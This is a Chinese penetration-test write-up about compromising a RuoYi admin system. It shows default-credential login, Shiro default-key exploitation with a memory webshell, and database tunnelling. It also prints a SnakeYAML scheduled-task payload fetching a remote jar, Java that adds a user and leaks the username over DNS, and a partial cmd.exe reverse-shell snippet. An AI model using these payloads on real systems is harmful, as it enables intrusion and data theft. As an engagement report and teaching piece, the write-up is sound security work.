记一次若依后台管理系统渗透

admin 2023年3月24日18:55:44评论23 views字数 3881阅读12分56秒阅读模式
  1. 1. 前言

最近客户开始hw前的风险排查,让我们帮他做个渗透测试,只给一个单位名称。通过前期的信息收集,发现了做个站点:

记一次若依后台管理系统渗透

{width="5.763888888888889in" height="3.203472222222222in"}

没有验证码,再加上做个图标,吸引了我注意:

记一次若依后台管理系统渗透

{width="0.6833333333333333in" height="0.7166666666666667in"}

  1. 1. 从弱口令开始

若依默认口令为admin/admin123,结果真的直接进了。

记一次若依后台管理系统渗透

{width="5.766666666666667in" height="3.963888888888889in"}

管理员权限,直接上工具探测一下是否有若依的几个漏洞:

记一次若依后台管理系统渗透

{width="5.767361111111111in" height="4.357638888888889in"}

工具链接:https://github.com/thelostworldFree/Ruoyi-All

还得是运气啊!原本想着直接用这个工具一键穿的,但是奈何没利用过若依的洞,这个工具也不会使用。后续去查看了几篇文章,需要上传jar包,该漏洞可通过定时任务去调用执行jar包。

文章地址:https://blog.csdn.net/FY10033/article/details/126206890

然后坑来了。按照教程去实践,发现怎么样也无法执行漏洞。以下是java代码:

  public AwesomeScriptEngineFactory() {
    try {
      Runtime.getRuntime().exec("net user test [email protected] /add");
      Runtime.getRuntime().exec("ping tttt.ogjxcqvtbf.dnstunnel.run");
      Runtime.getRuntime().exec("ping
  %USERNAME%.ogjxcqvtbf.dnstunnel.run");
    }catch (IOException e) {
       e.printStackTrace();
     }

  }

  1. 1. 还得从shiro入手

尝试了一下午后,想想算了,看看有没有别的洞吧。刚好文章里面有写到,ruoyi的shiro存在默认密钥,结果一尝试,还真的存在。(Ps:这边有个坑,我用文章里面提到的LiqunKit去尝试,无法执行命令。后续用了shiro_attack成功命令执行)

记一次若依后台管理系统渗透

{width="5.764583333333333in" height="2.4895833333333335in"}

然后通过shiro写入内存马:

记一次若依后台管理系统渗透

{width="5.183333333333334in" height="2.975in"}

对内存马感兴趣的,可以看下这两篇文章:

http://www.manongjc.com/detail/64-jmklbsfdbhdslrw.html

https://blog.csdn.net/MachineGunJoe/article/details/118088350

但是可惜,这是一台云主机,整个内网就一台主机。很多人可能看到esc,就不想再打了。不过我还是去翻了一下文件夹,把数据库账号也拉下来。

记一次若依后台管理系统渗透

{width="5.767361111111111in" height="4.582638888888889in"}

这个项目很奇怪,我找到的项目路径下全是jar包,我都怀疑这个是不是web目录。在基础信息里面找到了路径:

catalina.home =C:UsersAdministratorAppDataLocalTemp2tomcat.937421519914311975.808

但是进入该路径下,发现没文件,不知道是不是权限不够。

记一次若依后台管理系统渗透

{width="5.7659722222222225in" height="1.9326388888888888in"}

可以看到这边只限制127.0.0.1的ip访问,这就很尴尬,所以这边我使用ligolo代理3306出来,成功进行连接:

记一次若依后台管理系统渗透

{width="5.641666666666667in" height="6.158333333333333in"}

工具链接:https://github.com/FunnyWolf/ligolo

其实也尝试过添加用户,但是貌似被拦截了。原本想用哥斯拉的内存马进行一键提权的,但是不知道为什么,哥斯拉的内存马一直连接不上。有大佬懂的,还望不吝赐教。

  1. 1. 再战定时任务

但是对于定时任务没复现出来,我还是很执着,通过查看其它大佬写的文章,发现了原来这个jar包的代码有问题,windows和linux的命令执行不一样,windows没办法直接通过exec执行,需要调用cmd进程进行执行。后续参考了这篇文章:

https://www.cnblogs.com/BOHB-yunying/p/15661384.html

配置完后,后台添加定时任务

org.yaml.snakeyaml.Yaml.load('!!javax.script.ScriptEngineManager [!!java.net.URLClassLoader [[!!java.net.URL

["http://vpsip:8000/yaml-payload.jar"]]]]')

Java部分源码:

+-----------------------------------------------------------------------+ | String host="ip"; | | | |         int port = 6767; | | | |         String cmd="cmd.exe"; | | | |         Process p=new | | ProcessBuilder(cmd).redirectErrorStream(true).start(); | | | |         java.net.Socket s=new java.net.Socket(host,port); | | | |         java.io.InputStream | | pi=p.getInputStream(),pe=p.getErrorStream(),si=s.getInputStream(); | | | |         java.io.OutputStream | | po=p.getOutputStream(),so=s.getOutputStream(); | +=======================================================================+ +-----------------------------------------------------------------------+

然后通过以下命令编译并打包为jar包:

+-----------------------------------------------------------------------+ | javac src/artsploit/AwesomeScriptEngineFactory.java //编译java文件 | | | | jar -cvf yaml-payload.jar -C src/ . //打包jar包 | +=======================================================================+ +-----------------------------------------------------------------------+

成功反弹shell到我vps上:

记一次若依后台管理系统渗透

{width="5.761805555555555in" height="1.5215277777777778in"}

  1. 1. 总结与思考

其实如果整片文章看下来,可能会觉得比较顺利,但是其实踩了很多坑,以下是我自己的总结,也和大家分享一下:

  1. 1. 冰蝎多版本不支持shiro_attack生成的内存马,目前发现3.0Beta 9版本修复版支持;

  2. 2. 若依的定时任务java代码执行:Linux和windows的执行代码是不同的,windows需要调用cmd进程去执行,才导致一直测试不成功;

  3. 3. 冰蝎自带的socks代理和数据库工具很难用,经常出现奇奇怪怪的问题。可以使用第三方工具。如ligolo,把数据库端口映射出来,再去访问登录。我就是用自带的数据库管理工具连不上,然后socks代理也连不上,才使用第三方工具的;

  4. 4. net user添加用户失败大概率是权限不足或者杀软拦截了。上线后可以先tasklist查看是否有杀软。其实就是和渗透前的信息收集一样,上线后也要收集一下当前服务器的信息;

  5. 5. 遇到渗透的效果和自己预想的不一样的情况,要学会排查,猜测问题的原因。如我本次代理3306端口出来,一直去尝试账号密码登录,但是一直登录不上。排查了一圈,才发现当时为了安全起见,把我的代理端口限制IP访问了。

原创稿件征集

征集原创技术文章中,欢迎投递

投稿邮箱:[email protected]

文章类型:黑客极客技术、信息安全热点安全研究分析安全相关

通过审核并发布能收获200-800元不等的稿酬。


更多详情,点我查看!

记一次若依后台管理系统渗透
靶场实操,戳“阅读原文“

原文始发于微信公众号(合天网安实验室):记一次若依后台管理系统渗透

特别标注: 本站(CN-SEC.COM)所有文章仅供技术研究,若将其信息做其他用途,由用户承担全部法律及连带责任,本站不承担任何法律及连带责任,请遵守中华人民共和国安全法.
  • 我的微信
  • 微信扫一扫
  • weinxin
  • 我的微信公众号
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年3月24日18:55:44
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                  记一次若依后台管理系统渗透 https://cn-sec.com/archives/1626353.html

发表评论

匿名网友 填写信息

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: